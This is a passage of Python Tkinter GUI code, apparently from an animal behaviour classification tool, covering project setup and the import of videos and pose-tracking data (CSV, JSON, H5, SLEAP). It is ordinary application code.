vidformat = self.label_vidformat.entry_get
bitrate = self.label_bitrate.entry_get
fps = self.label_fps.entry_get
mergemovieffmpeg(self.folderpath1selected.folder_path,fps,vidformat,bitrate,imgformat)
print('Video created.')
class creategif:
def __init__(self):
# Popup window
create_gif = Toplevel()
create_gif.minsize(250, 250)
create_gif.wm_title("Generate Gif from video")
#Create Gif
label_creategif = LabelFrame(create_gif,text='Video to Gif',padx=5,pady=5,font='bold')
# select video to convert to gif
videoselected = FileSelect(label_creategif, 'Video path',title='Select a video file')
label_starttime = Entry_Box(label_creategif,'Start time(s)','12')
label_duration = Entry_Box(label_creategif,'Duration(s)','12')
label_size = Entry_Box(label_creategif,'Width','12')
size_description = Label(label_creategif,text='example width: 240,360,480,720,1080',font=("Times", 10, "italic"))
#convert
button_creategif = Button(label_creategif,text='Generate Gif',command=lambda :generategif(videoselected.file_path,label_starttime.entry_get,label_duration.entry_get,label_size.entry_get))
#organize
label_creategif.grid(row=0,sticky=W)
videoselected.grid(row=0,sticky=W,pady=5)
label_starttime.grid(row=1,sticky=W)
label_duration.grid(row=2,sticky=W)
label_size.grid(row=3,sticky=W)
size_description.grid(row=4,sticky=W)
button_creategif.grid(row=5,sticky=E,pady=10)
class new_window:
def open_Folder(self):
print("Current directory is %s" % os.getcwd())
folder = askdirectory(title='Select Frame Folder')
os.chdir(folder)
print("Working directory is %s" % os.getcwd())
def __init__(self, script_name):
window = Tk()
folder = Frame(window)
folder.grid(row = 0, column = 1, sticky = N)
choose_folder = Label(folder, text="Choose Folder")
choose_folder.grid(row = 0, column = 0, sticky = W)
select_folder = Button(folder, text="Choose Folder...", command=self.open_Folder)
select_folder.grid(row = 0, column = 0, sticky = W)
run_script = Button(folder, text="Run", command=script_name.main)
run_script.grid(columnspan = 2, sticky = S)
def createWindow(scriptname):
new_window(scriptname)
class get_coordinates_from_video:
def __init__(self):
# Popup window
getcoord = Toplevel()
getcoord.minsize(200, 200)
getcoord.wm_title('Get Coordinates in Video')
# settings files selected
self.videopath1selected = FileSelect(getcoord, "Video selected",title='Select a video file')
# label for known mm
self.label_knownmm = Entry_Box(getcoord,'Known length in real life(mm)','0')
#button
button_getcoord = Button(getcoord, text='Get Distance', command=self.getcoord)
#organize
self.videopath1selected.grid(row=0,column=0,pady=10,sticky=W)
self.label_knownmm.grid(row=1,column=0,pady=10,sticky=W)
button_getcoord.grid(row=2,column=0,pady=10)
def getcoord(self):
filename= self.videopath1selected.file_path
knownmm_value = self.label_knownmm.entry_get
if knownmm_value == '':
print('Please enter the known millimeters to continue')
elif filename != '' and filename != 'No file selected':
getco = get_coordinates_nilsson(self.videopath1selected.file_path,knownmm_value)
print('The distance between the two set points is ', str(getco))
else:
print('Please select a video')
class project_config:
def __init__(self):
self.all_entries = []
self.allmodels = []
# Popup window
self.toplevel = Toplevel()
self.toplevel.minsize(750, 750)
self.toplevel.wm_title("Project Configuration")
#tab
tab_parent = ttk.Notebook(hxtScrollbar(self.toplevel))
tab1 = ttk.Frame(tab_parent)
tab2 = ttk.Frame(tab_parent)
tab3 = ttk.Frame(tab_parent)
tab4 = ttk.Frame(tab_parent)
#tab title
tab_parent.add(tab1,text=f'{"[ Generate project config ]": ^20s}')
tab_parent.add(tab2, text=f'{"[ Import videos into project folder ]": ^20s}')
tab_parent.add(tab3, text=f'{"[ Import tracking data ]": ^20s}')
tab_parent.add(tab4, text=f'{"[ Extract frames into project folder ]": ^20s}')
#initiate tab
tab_parent.grid(row=0)
# General Settings
self.label_generalsettings = LabelFrame(tab1, text='General Settings',fg='black',font =("Helvetica",12,'bold'),padx=5,pady=5)
self.directory1Select = FolderSelect(self.label_generalsettings, "Project Path:", title='Select Main Directory',lblwidth='12')
self.label_project_name = Entry_Box(self.label_generalsettings, 'Project Name:',labelwidth='12')
label_project_namedescrip = Label(self.label_generalsettings, text='(project name cannot contain spaces)')
self.csvORparquet = DropDownMenu(self.label_generalsettings,'Workflow file type',['csv','parquet'],'15')
self.csvORparquet.setChoices('csv')
#SML Settings
self.label_smlsettings = LabelFrame(self.label_generalsettings, text='SML Settings',padx=5,pady=5)
self.label_notarget = Entry_Box(self.label_smlsettings,'Number of predictive classifiers (behaviors):','33',
validation='numeric')
addboxButton = Button(self.label_smlsettings, text='<Add predictive classifier>', fg="navy",
command=lambda:self.addBox(self.label_notarget.entry_get))
##dropdown for # of mice
self.dropdownbox = LabelFrame(self.label_generalsettings, text='Animal Settings')
## choose multi animal or not
self.singleORmulti = DropDownMenu(self.dropdownbox,'Type of Tracking',['Classic tracking','Multi tracking'],'15',
com=self.trackingselect)
self.singleORmulti.setChoices('Classic tracking')
#choice
self.frame2 = Frame(self.dropdownbox)
label_dropdownmice = Label(self.frame2, text='# config')
self.option_mice, optionsBasePhotosList = bodypartConfSchematic()
# del multi animal
del self.option_mice[9:12]
del optionsBasePhotosList[9:12]
self.var = StringVar()
self.var.set(self.option_mice[6])
micedropdown = OptionMenu(self.frame2, self.var, *self.option_mice)
self.var.trace("w", self.change_image)
self.photos = []
for i in range(len(optionsBasePhotosList)):
self.photos.append(PhotoImage(file=os.path.join(os.path.dirname(__file__),(optionsBasePhotosList[i]))))
self.label = Label(self.frame2, image=self.photos[6])
self.label.grid(row=10,sticky=W,columnspan=2)
#reset button
resetbutton = Button(self.frame2,text='Reset user-defined pose configs',command=self.resetSettings)
#organize
self.singleORmulti.grid(row=0,sticky=W)
self.frame2.grid(row=1,sticky=W)
label_dropdownmice.grid(row=0,column=0,sticky=W)
micedropdown.grid(row=0,column=1,sticky=W)
self.label.grid(row=1,sticky=W,columnspan=2)
resetbutton.grid(row=0,sticky=W,column=2)
#generate project ini
button_generateprojectini = Button(self.label_generalsettings, text='Generate Project Config ', command=self.make_projectini, font=("Helvetica",10,'bold'),fg='navy')
#####import videos
label_importvideo = LabelFrame(tab2, text='Import Videos into project folder',fg='black', font=("Helvetica",12,'bold'), padx=15, pady=5)
# multi video
label_multivideoimport = LabelFrame(label_importvideo, text='Import multiple videos', pady=5, padx=5)
self.multivideofolderpath = FolderSelect(label_multivideoimport, 'Folder path',title='Select Folder with videos')
self.video_type = Entry_Box(label_multivideoimport, 'Format (i.e., mp4, avi):', '18')
button_multivideoimport = Button(label_multivideoimport, text='Import multiple videos',command= self.import_multivid,fg='navy')
# singlevideo
label_singlevideoimport = LabelFrame(label_importvideo, text='Import single video', pady=5, padx=5)
self.singlevideopath = FileSelect(label_singlevideoimport, "Video path",title='Select a video file')
button_importsinglevideo = Button(label_singlevideoimport, text='Import a video',command= self.import_singlevid,fg='navy')
#import all csv file into project folder
self.label_import_csv = LabelFrame(tab3,text='Import Tracking Data',fg='black',font=("Helvetica",12,'bold'),pady=5,padx=5)
self.filetype = DropDownMenu(self.label_import_csv,'File type',['CSV (DLC/DeepPoseKit)','JSON (BENTO)','H5 (multi-animal DLC)','SLP (SLEAP)'],'12',com=self.fileselected)
self.filetype.setChoices('CSV (DLC/DeepPoseKit)')
self.frame = Frame(self.label_import_csv)
#multicsv
label_multicsvimport = LabelFrame(self.frame, text='Import multiple csv files', pady=5, padx=5)
self.folder_csv = FolderSelect(label_multicsvimport,'Folder Select:',title='Select Folder with .csv(s)')
button_import_csv = Button(label_multicsvimport,text='Import csv to project folder',command = self.import_multicsv,fg='navy')
#singlecsv
label_singlecsvimport = LabelFrame(self.frame, text='Import single csv file', pady=5, padx=5)
self.file_csv = FileSelect(label_singlecsvimport,'File Select',title='Select a .csv file')
button_importsinglecsv = Button(label_singlecsvimport,text='Import single csv to project folder',command=self.import_singlecsv,fg='navy')
#extract videos in projects
label_extractframes = LabelFrame(tab4,text='Extract Frames into project folder',fg='black',font=("Helvetica",12,'bold'),pady=5,padx=5)
label_note = Label(label_extractframes,text='Note: This is no longer needed for labelling videos. Instead, extract video frames are used for visualizations')
label_caution = Label(label_extractframes,text='Caution: This extract all frames from all videos in project,')
label_caution2 = Label(label_extractframes,text='and is computationally expensive if there is a lot of videos at high frame rates/resolution.')
button_extractframes = Button(label_extractframes,text='Extract frames',command=self.extract_frames,fg='navy')
#organize
self.label_generalsettings.grid(row=0,sticky=W)
self.directory1Select.grid(row=1,column=0,sticky=W)
self.label_project_name.grid(row=2,column=0,sticky=W)
label_project_namedescrip.grid(row=3,sticky=W)
self.csvORparquet.grid(row=4,sticky=W)
self.label_smlsettings.grid(row=5,column=0,sticky=W,pady=5,columnspan=2)
self.label_notarget.grid(row=0,column=0,sticky=W,pady=5,columnspan=2)
addboxButton.grid(row=1,column=0,sticky=W,pady=6)
self.dropdownbox.grid(row=6,column=0,sticky=W)
button_generateprojectini.grid(row=20, pady=5, ipadx=5, ipady=5)
label_importvideo.grid(row=4,sticky=W,pady=5)
label_multivideoimport.grid(row=0, sticky=W)
self.multivideofolderpath.grid(row=0, sticky=W)
self.video_type.grid(row=1, sticky=W)
button_multivideoimport.grid(row=2, sticky=W)
label_singlevideoimport.grid(row=1,sticky=W)
self.singlevideopath.grid(row=0,sticky=W)
button_importsinglevideo.grid(row=1,sticky=W)
self.label_import_csv.grid(row=5,sticky=W,pady=5)
self.filetype.grid(row=0,sticky=W)
self.frame.grid(row=1,sticky=W)
label_multicsvimport.grid(row=1,sticky=W)
self.folder_csv.grid(row=0,sticky=W)
button_import_csv.grid(row=1,sticky=W)
label_singlecsvimport.grid(row=2,sticky=W)
self.file_csv.grid(row=0,sticky=W)
button_importsinglecsv.grid(row=1,sticky=W)
label_extractframes.grid(row=7,sticky=W)
label_note.grid(row=0,sticky=W)
label_caution.grid(row=1,sticky=W)
label_caution2.grid(row=2,sticky=W)
button_extractframes.grid(row=3,sticky=W)
def trackingselect(self,val):
try:
self.frame2.destroy()
except:
pass
# choice
self.frame2 = Frame(self.dropdownbox)
if val == 'Classic tracking':
label_dropdownmice = Label(self.frame2, text='# config')
self.option_mice, optionsBasePhotosList = bodypartConfSchematic()
# del multi animal
del self.option_mice[9:12]
del optionsBasePhotosList[9:12]
self.var = StringVar()
self.var.set(self.option_mice[6])
micedropdown = OptionMenu(self.frame2, self.var, *self.option_mice)
self.var.trace("w", self.change_image)
self.photos = []
for i in range(len(optionsBasePhotosList)):
self.photos.append(PhotoImage(file=os.path.join(os.path.dirname(__file__), (optionsBasePhotosList[i]))))
self.label = Label(self.frame2, image=self.photos[6])
self.label.grid(row=10, sticky=W, columnspan=2)
# reset button
resetbutton = Button(self.frame2, text='Reset user-defined pose configs', command=self.resetSettings)
# organize
self.frame2.grid(row=1, sticky=W)
label_dropdownmice.grid(row=0, column=0, sticky=W)
micedropdown.grid(row=0, column=1, sticky=W)
self.label.grid(row=1, sticky=W, columnspan=2)
resetbutton.grid(row=0, sticky=W, column=2)
else:
if val == 'Multi tracking':
label_dropdownmice = Label(self.frame2, text='# config')
self.option_mice, optionsBasePhotosList = bodypartConfSchematic()
# del single animal
del self.option_mice[0:9]
del optionsBasePhotosList[0:9]
self.var = StringVar()
self.var.set(self.option_mice[2])
micedropdown = OptionMenu(self.frame2, self.var, *self.option_mice)
self.var.trace("w", self.change_image)
self.photos = []
for i in range(len(optionsBasePhotosList)):
self.photos.append(
PhotoImage(file=os.path.join(os.path.dirname(__file__), (optionsBasePhotosList[i]))))
self.label = Label(self.frame2, image=self.photos[2])
self.label.grid(row=10, sticky=W, columnspan=2)
# reset button
resetbutton = Button(self.frame2, text='Reset user-defined pose configs', command=self.resetSettings)
# organize
self.frame2.grid(row=1, sticky=W)
label_dropdownmice.grid(row=0, column=0, sticky=W)
micedropdown.grid(row=0, column=1, sticky=W)
self.label.grid(row=1, sticky=W, columnspan=2)
resetbutton.grid(row=0, sticky=W, column=2)
def fileselected(self,val):
try:
self.frame.destroy()
except:
pass
self.frame = Frame(self.label_import_csv)
if self.filetype.getChoices()=='CSV (DLC/DeepPoseKit)':
# multicsv
label_multicsvimport = LabelFrame(self.frame, text='Import multiple csv files', pady=5, padx=5)
self.folder_csv = FolderSelect(label_multicsvimport, 'Folder Select:', title='Select Folder with .csv(s)')
button_import_csv = Button(label_multicsvimport, text='Import csv to project folder',
command=self.import_multicsv, fg='navy')
# singlecsv
label_singlecsvimport = LabelFrame(self.frame, text='Import single csv file', pady=5, padx=5)
self.file_csv = FileSelect(label_singlecsvimport, 'File Select', title='Select a .csv file')
button_importsinglecsv = Button(label_singlecsvimport, text='Import single csv to project folder',
command=self.import_singlecsv, fg='navy')
self.frame.grid(row=1,sticky=W)
label_multicsvimport.grid(row=1, sticky=W)
self.folder_csv.grid(row=0, sticky=W)
button_import_csv.grid(row=1, sticky=W)
label_singlecsvimport.grid(row=2, sticky=W)
self.file_csv.grid(row=0, sticky=W)
button_importsinglecsv.grid(row=1, sticky=W)
elif self.filetype.getChoices()=='JSON (BENTO)':
# multijson
label_multijsonimport = LabelFrame(self.frame, text='Import multiple json files', pady=5, padx=5)
self.folder_json = FolderSelect(label_multijsonimport, 'Folder Select:',
title='Select Folder with .json(s)')
button_import_json = Button(label_multijsonimport, text='Import json to project folder',
command=lambda: json2csv_folder(self.configinifile,
self.folder_json.folder_path), fg='navy')
# singlecsv
label_singlejsonimport = LabelFrame(self.frame, text='Import single json file', pady=5, padx=5)
self.file_json = FileSelect(label_singlejsonimport, 'File Select', title='Select a .csv file')
button_importsinglejson = Button(label_singlejsonimport, text='Import single .json to project folder',
command=lambda: json2csv_file(self.configinifile, self.file_json.file_path),
fg='navy')
# import json into projectfolder
self.frame.grid(row=1, sticky=W)
label_multijsonimport.grid(row=1, sticky=W)
self.folder_json.grid(row=0, sticky=W)
button_import_json.grid(row=1, sticky=W)
label_singlejsonimport.grid(row=2, sticky=W)
self.file_json.grid(row=0, sticky=W)
button_importsinglejson.grid(row=1, sticky=W)
elif self.filetype.getChoices() in ('H5 (multi-animal DLC)','SLP (SLEAP)'):
animalsettings = LabelFrame(self.frame,text='Animal settings',pady=5,padx=5)
noofanimals = Entry_Box(animalsettings,'No of animals','15')
animalnamebutton = Button(animalsettings,text='Confirm',command=lambda:self.animalnames(noofanimals.entry_get,animalsettings))
if self.filetype.getChoices() == 'H5 (multi-animal DLC)':
options =['skeleton','box','ellipse']
self.dropdowndlc = DropDownMenu(self.frame,'Tracking type',options,'15')
self.dropdowndlc.setChoices(options[1])
self.h5path = FolderSelect(self.frame,'Path to h5 files',lblwidth=15)
labelinstruction = Label(self.frame,text='Please import videos before importing the multi animal DLC tracking data')
runsettings = Button(self.frame,text='Import h5',command=self.importh5)
#organize
self.dropdowndlc.grid(row=2, sticky=W)
else:
self.h5path = FolderSelect(self.frame, 'Path to .slp files', lblwidth=15)
labelinstruction = Label(self.frame,
text='Please import videos before importing the multi animal SLEAP tracking data')
runsettings = Button(self.frame, text='Import .slp', command=self.importh5)
#organize
self.frame.grid(row=1,sticky=W)
animalsettings.grid(row=1,sticky=W)
noofanimals.grid(row=0,sticky=W)
animalnamebutton.grid(row=0,column=1,sticky=W)
self.h5path.grid(row=3,sticky=W)
labelinstruction.grid(row=4,pady=10,sticky=W)
runsettings.grid(row=5,pady=10)
def importh5(self):
idlist = []
try:
for i in self.animalnamelist:
idlist.append(i.entry_get)
except AttributeError:
print('Please fill in the animal identity names appropriately.')
id_ini = idlist.copy()
id_ini = str(id_ini)
if currentPlatform == 'Windows':
id_ini = id_ini.replace('\'','')
if currentPlatform == 'Linux'or (currentPlatform == 'Darwin'):
id_ini = id_ini.replace('/', '')
id_ini = id_ini.replace('[', '')
id_ini = id_ini.replace(']', '')
id_ini = id_ini.replace(' ', '')
config = ConfigParser()
configFile = str(self.configinifile)
config.read(configFile)
# write the new values into ini file
config.set('Multi animal IDs', 'ID_list',id_ini)
with open(self.configinifile, 'w') as configfile:
config.write(configfile)
if self.filetype.getChoices() == 'H5 (multi-animal DLC)':
importMultiDLCpose(self.configinifile,self.h5path.folder_path,self.dropdowndlc.getChoices(),idlist)
else:
##SLEAP
try:
importSLEAPbottomUP(self.configinifile,self.h5path.folder_path,idlist)
except Exception as e:
messagebox.showerror("Error", str(e))
def animalnames(self,noofanimal,master):
try:
self.frame2.destroy()
except:
pass
no_animal = int(noofanimal)
self.animalnamelist =[0]*no_animal
self.frame2 = Frame(master)
self.frame2.grid(row=1,sticky=W)
for i in range(no_animal):
self.animalnamelist[i] = Entry_Box(self.frame2,'Animal ' + str(i+1) + ' name','15')
self.animalnamelist[i].grid(row=i,sticky=W)
def resetSettings(self):
popup = Tk()
popup.minsize(300, 100)
popup.wm_title("Warning!")
popupframe = LabelFrame(popup)
label = Label(popupframe, text='Do you want to reset user-defined pose-configs?')
label.grid(row=0,columnspan=2)
B1 = Button(popupframe,text='Yes', command= lambda:reset_DiagramSettings(popup))
B2 = Button(popupframe, text="No", command=popup.destroy)
popupframe.grid(row=0,columnspan=2)
B1.grid(row=1,column=0,sticky=W)
B2.grid(row=1,column=1,sticky=W)
popup.mainloop()
def poseconfigSettings(self):
# Popup window
poseconfig = Toplevel()
poseconfig.minsize(400, 400)
poseconfig.wm_title("Pose Configuration")
# define name for poseconfig settings
self.configname = Entry_Box(poseconfig,'Pose config name','15')
# no of animals
self.noOfAnimals = Entry_Box(poseconfig,'# of Animals','15')
# no of bodyparts
self.noOfBp = Entry_Box(poseconfig,'# of Bodyparts','15')
# path to image
self.imgPath = FileSelect(poseconfig,'Image Path')
# button for bodypart table
tablebutton = Button(poseconfig,text='Confirm',command= lambda :self.bpTable(poseconfig))
#button for saving poseconfig
self.saveposeConfigbutton = Button(poseconfig,text='Save Pose Config',command=lambda:self.savePoseConfig(poseconfig))
self.saveposeConfigbutton.config(state='disabled')
#organize
self.configname.grid(row=0,sticky=W)
self.noOfAnimals.grid(row=1,sticky=W)
self.noOfBp.grid(row=2,sticky=W)
self.imgPath.grid(row=3,sticky=W,pady=2)
tablebutton.grid(row=4,pady=5)
self.saveposeConfigbutton.grid(row=6,pady=5)
def savePoseConfig(self, master):
configName = self.configname.entry_get
noAnimals = self.noOfAnimals.entry_get
noBps = self.noOfBp.entry_get
Imagepath = self.imgPath.file_path
BpNameList = []
for i in self.bpnamelist:
BpNameList.append(i.entry_get)
define_new_pose_configuration(configName, noAnimals, noBps, Imagepath, BpNameList, noAnimals)
master.destroy()
self.toplevel.destroy()
project_config()
def bpTable(self,master):
print(self.noOfBp.entry_get)
noofbp = int(self.noOfBp.entry_get)
self.bpnamelist = [0]*noofbp
if currentPlatform == 'Windows':
frame = LabelFrame(master,text='Bodyparts\' name')
if currentPlatform == 'Linux'or (currentPlatform == 'Darwin'):
frame = LabelFrame(master,text='Bodyparts/' 'name')
frame.grid(row=5,sticky=W)
for i in range(noofbp):
self.bpnamelist[i] = Entry_Box(frame,str(i+1),'2')
self.bpnamelist[i].grid(row=i)
self.saveposeConfigbutton.config(state='normal')
def change_image(self,*args):
if (self.var.get() != 'Create pose config...'):
self.label.config(image=self.photos[self.option_mice.index(str(self.var.get()))])
else:
self.poseconfigSettings()
def import_singlecsv(self):
copy_singlecsv_ini(self.configinifile, self.file_csv.file_path)
# read in configini
configFile = str(self.configinifile)
config = ConfigParser()
config.read(configFile)
animalIDlist = config.get('Multi animal IDs', 'id_list')
if not animalIDlist:
csvfile = os.path.join(os.path.dirname(self.configinifile), 'csv', 'input_csv',os.path.basename(self.file_csv.file_path))
df = pd.read_csv(csvfile)
tmplist = []
for i in df.loc[0]:
tmplist.append(i)
if 'individuals' in tmplist:
tmplist.remove('individuals')
if len(set(tmplist)) == 1:
print('single animal using maDLC detected. Removing "individuals" row...')
df = df.iloc[1:]
df.to_csv(csvfile, index=False)
print('Row removed for', os.path.basename(i))
else:
pass
def import_multicsv(self):
try:
copy_allcsv_ini(self.configinifile, self.folder_csv.folder_path)
#read in configini
configFile = str(self.configinifile)
config = ConfigParser()
config.read(configFile)
animalIDlist = config.get('Multi animal IDs', 'id_list')
if not animalIDlist:
# get all csv in project folder input csv
csvfolder = os.path.join(os.path.dirname(self.configinifile), 'csv', 'input_csv')
allcsvs = []
for i in os.listdir(csvfolder):
if i.endswith('.csv'):
csvfile = os.path.join(csvfolder, i)
allcsvs.append(csvfile)
# screen for madlc format but single animal
for i in allcsvs:
df = pd.read_csv(i)
tmplist = []
for j in df.loc[0]:
tmplist.append(j)
#if it is madlc
if 'individuals' in tmplist:
tmplist.remove('individuals')
#if only single animal in madlc
if len(set(tmplist)) == 1:
print('single animal using maDLC detected. Removing "individuals" row...')
df = df.iloc[1:]
df.to_csv(i, index=False)
print('Row removed for',os.path.basename(i))
else:
pass
print('Finished importing tracking data')
except:
print('Please select folder with csv to proceed')
def import_multivid(self):
try:
copy_multivideo_ini(self.configinifile, self.multivideofolderpath.folder_path, self.video_type.entry_get)
except:
print('Please select a folder containing the videos and enter the correct video format to proceed')
def import_singlevid(self):
try:
copy_singlevideo_ini(self.configinifile, self.singlevideopath.file_path)
except:
print('Please select a video to proceed')
def addBox(self, noTargetStr):
try:
for i in self.lab:
i.destroy()
for i in self.ent1:
i.destroy()
except:
pass
try:
noTarget = int(noTargetStr)
except ValueError:
assert False, 'Invalid number of predictive classifiers'
self.all_entries = []
self.lab=[0]*noTarget
self.ent1=[0]*noTarget
for i in range(noTarget):
self.lab[i]= Label(self.label_smlsettings, text=str('Classifier ') + str(i + 1))
self.lab[i].grid(row=i+2, column=0, sticky=W)
self.ent1[i] = Entry(self.label_smlsettings)
self.ent1[i].grid(row=i+2, column=1, sticky=W)
self.all_entries = self.ent1
def setFilepath(self):
file_selected = askopenfilename()
self.modelPath.set(file_selected)
def make_projectini(self):
#get input from user
#general settings input
project_path = self.directory1Select.folder_path
project_name = self.label_project_name.entry_get
msconfig= str('yes')
#sml settings
no_targets = self.label_notarget.entry_get
target_list = []
for number, ent1 in enumerate(self.all_entries):
target_list.append(ent1.get())
### animal settings
listindex = self.option_mice.index(str(self.var.get()))
if self.singleORmulti.getChoices()=='Classic tracking':
if listindex == 0:
bp = '4'
elif listindex == 1:
bp = '7'
elif listindex == 2:
bp = '8'
elif listindex == 3:
bp = '9'
elif (listindex == 4):
bp = '8'
elif (listindex == 5):
bp='14'
elif (listindex == 6):
bp = '16'
elif listindex == 7:
bp = '987'
elif listindex == 8:
bp = 'user_defined'
else:
bp = 'user_defined'
elif self.singleORmulti.getChoices() =='Multi tracking':
if listindex == 0:
bp = '8'
elif listindex == 1:
bp = '14'
elif listindex == 2:
bp = '16'
else:
bp = 'user_defined'
if (self.singleORmulti.getChoices() =='Classic tracking') and (bp=='user_defined') and (listindex >8):
listindex = listindex + 3
elif (self.singleORmulti.getChoices()=='Multi tracking') and (bp=='user_defined') and (listindex >2):
pass
noAnimalsPath = os.path.join(os.path.dirname(__file__), 'pose_configurations', 'no_animals', 'no_animals.csv')
with open(noAnimalsPath, "r", encoding='utf8') as f:
cr = csv.reader(f, delimiter=",") # , is default
rows = list(cr) # create a list of rows for instance
if (self.singleORmulti.getChoices()=='Multi tracking'):
listindex += 9
animalNo = str(rows[listindex])
self.configinifile = write_inifile(msconfig,project_path,project_name,no_targets,target_list,bp, listindex, animalNo,self.csvORparquet.getChoices())
print('Project ' + '"' + str(project_name) + '"' + " created in folder " + '"' + str(os.path.basename(project_path)) + '"')
def extract_frames(self):
try:
videopath = os.path.join(os.path.dirname(self.configinifile), 'videos')
print(videopath)
extract_frames_ini(videopath, self.configinifile)
except:
print('Please make sure videos are imported and located in /project_folder/videos')
class loadprojectMenu:
def __init__(self,inputcommand):
lpMenu = Toplevel()
lpMenu.minsize(300, 200)
lpMenu.wm_title("Load Project .ini file")
# load project ini
label_loadprojectini = LabelFrame(lpMenu, text='Load Project .ini', font=("Helvetica", 12, 'bold'), pady=5,
padx=5, fg='black')
self.projectconfigini = FileSelect(label_loadprojectini,'File Select:', title='Select config.ini file')
#button
launchloadprojectButton = Button(lpMenu,text='Load Project',command=lambda:self.launch(lpMenu,inputcommand))
#organize
label_loadprojectini.grid(row=0)
self.projectconfigini.grid(row=0,sticky=W)
launchloadprojectButton.grid(row=1,pady=10)
def launch(self,master,command):
if (self.projectconfigini.file_path.endswith('.ini')):
master.destroy()
print(self.projectconfigini.file_path)
command(self.projectconfigini.file_path)
else:
print('Please select the project_config.ini file')
def open_web_link(url):
sys.excepthook = cef.ExceptHook # To shutdown all CEF processes on error
cef.Initialize()
cef.CreateBrowserSync(url=url,
window_title=url)
cef.MessageLoop()
def wait_for_internet_connection(url):
while True:
try:
response = urllib.request.urlopen(url, timeout=1)
return
except:
pass
class loadprojectini:
def __init__(self,configini):
#save project ini as attribute
self.projectconfigini = configini
#bodyparts
bodypartscsv= os.path.join((os.path.dirname(self.projectconfigini)),'logs','measures','pose_configs','bp_names','project_bp_names.csv')
bp_set = pd.read_csv(bodypartscsv,header=None)[0].to_list()
# get target
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
notarget = config.getint('SML settings','no_targets')
pose_config_setting = config.get('create ensemble settings','pose_estimation_body_parts')
animalNumber = config.getint('General settings','animal_no')
if pose_config_setting == 'user_defined':
bpSet_2 = bp_set.copy()
if animalNumber > 1:
bpSet_2 = [x[:-2] for x in bpSet_2]
bpSet_2 = list(set(bpSet_2))
targetlist = {}
for i in range(notarget):
targetlist[(config.get('SML settings','target_name_'+str(i+1)))]=(config.get('SML settings','target_name_'+str(i+1)))
#starting of gui
simongui = Toplevel()
simongui.minsize(1300, 800)
simongui.wm_title("Load project")
simongui.columnconfigure(0, weight=1)
simongui.rowconfigure(0, weight=1)
tab_parent = ttk.Notebook(hxtScrollbar(simongui))
tab2 = ttk.Frame(tab_parent)
tab3 = ttk.Frame(tab_parent)
tab4 = ttk.Frame(tab_parent)
tab5 = ttk.Frame(tab_parent)
tab6 = ttk.Frame(tab_parent)
tab7 = ttk.Frame(tab_parent)
tab8 = ttk.Frame(tab_parent)
tab9 = ttk.Frame(tab_parent)
tab10 = ttk.Frame(tab_parent)
tab11 = ttk.Frame(tab_parent)
tab12 = ttk.Frame(tab_parent)
tab_parent.add(tab2, text= f"{'[ Further imports (data/video/frames) ]':20s}")
tab_parent.add(tab3, text=f"{'[ Video parameters ]':20s}")
tab_parent.add(tab4, text=f"{'[ Outlier correction ]':20s}")
tab_parent.add(tab6, text=f"{'[ ROI ]':10s}")
tab_parent.add(tab5, text=f"{'[ Extract features ]':20s}")
tab_parent.add(tab7, text=f"{'[ Label behavior] ':20s}")
tab_parent.add(tab8, text=f"{'[ Train machine model ]':20s}")
tab_parent.add(tab9, text=f"{'[ Run machine model ]':20s}")
tab_parent.add(tab10, text=f"{'[ Visualizations ]':20s}")
tab_parent.add(tab11, text=f"{'[ Classifier validation ]':20s}")
tab_parent.add(tab12,text=f"{'[ Add-ons ]':20s}")
tab_parent.grid(row=0)
tab_parent.enable_traversal()
#label import
label_import = LabelFrame(tab2)
#import all csv file into project folder
self.label_import_csv = LabelFrame(label_import, text='Import further tracking data', font=("Helvetica",12,'bold'), pady=5, padx=5,fg='black')
filetype = DropDownMenu(self.label_import_csv,'File type',['CSV (DLC/DeepPoseKit)','JSON (BENTO)','H5 (multi-animal DLC)','SLP (SLEAP)'],'15',com=self.fileselected)
filetype.setChoices('CSV (DLC/DeepPoseKit)')
self.frame = Frame(self.label_import_csv)
# multicsv
label_multicsvimport = LabelFrame(self.frame, text='Import multiple csv files', pady=5, padx=5)
self.folder_csv = FolderSelect(label_multicsvimport, 'Folder selected:',title='Select Folder with .csv(s)')
button_import_csv = Button(label_multicsvimport, text='Import csv to project folder',command= self.importdlctracking_multi,fg='navy')
# singlecsv
label_singlecsvimport = LabelFrame(self.frame, text='Import single csv files', pady=5, padx=5)
self.file_csv = FileSelect(label_singlecsvimport, 'File selected',title='Select a .csv file')
button_importsinglecsv = Button(label_singlecsvimport, text='Import single csv to project folder',command= self.importdlctracking_single,fg='navy')
#import videos
label_importvideo = LabelFrame(label_import, text='Import further videos into project folder', font=("Helvetica",12,'bold'), padx=15,pady=5,fg='black')
# multi video
label_multivideoimport = LabelFrame(label_importvideo, text='Import multiple videos', pady=5, padx=5)
self.multivideofolderpath = FolderSelect(label_multivideoimport, 'Folder path',title='Select Folder with videos')
self.video_type = Entry_Box(label_multivideoimport, 'File format (i.e., mp4/avi):', '20')
button_multivideoimport = Button(label_multivideoimport, text='Import multiple videos',command=self.importvideo_multi, fg='black')
# singlevideo
label_singlevideoimport = LabelFrame(label_importvideo, text='Import single video', pady=5, padx=5)
self.singlevideopath = FileSelect(label_singlevideoimport, "Video Path",title='Select a video file')
button_importsinglevideo = Button(label_singlevideoimport, text='Import a video',command= self.importvideo_single,fg='black')
#extract frames in project folder
label_extractframes = LabelFrame(label_import, text='Extract further frames into project folder', font=("Helvetica",12,'bold'), pady=5,padx=5,fg='black')
button_extractframes = Button(label_extractframes, text='Extract frames', command=self.extract_frames_loadini)
#import frames
label_importframefolder = LabelFrame(label_import, text='Import frame folders', font=("Helvetica",12,'bold'), pady=5,padx=5,fg='black')
self.frame_folder = FolderSelect(label_importframefolder,'Main frame directory',title='Select the main directory with frame folders')
button_importframefolder = Button(label_importframefolder,text='Import frames',command = self.importframefolder )
#import new classifier
label_newclassifier = LabelFrame(label_import,text='Add new classifier(s)', font=("Helvetica",12,'bold'), pady=5,padx=5,fg='black')
self.classifierentry = Entry_Box(label_newclassifier,'Classifier','8')
button_addclassifier = Button(label_newclassifier,text='Add classifier',command=lambda:self.addclassifier(self.classifierentry.entry_get))
#remove classifier
label_removeclassifier = LabelFrame(label_import,text='Remove existing classifier(s)', font=("Helvetica",12,'bold'), pady=5,padx=5,fg='black')
button_removeclassifier = Button(label_removeclassifier,text='Choose a classifier to remove',command=self.removeclassifiermenu)
## archive all csvs
label_archivecsv = LabelFrame(label_import,text='Archive processed files', font=("Helvetica",12,'bold'), pady=5,padx=5,fg='black')
archiveentrybox = Entry_Box(label_archivecsv,'Archive folder name', '16')
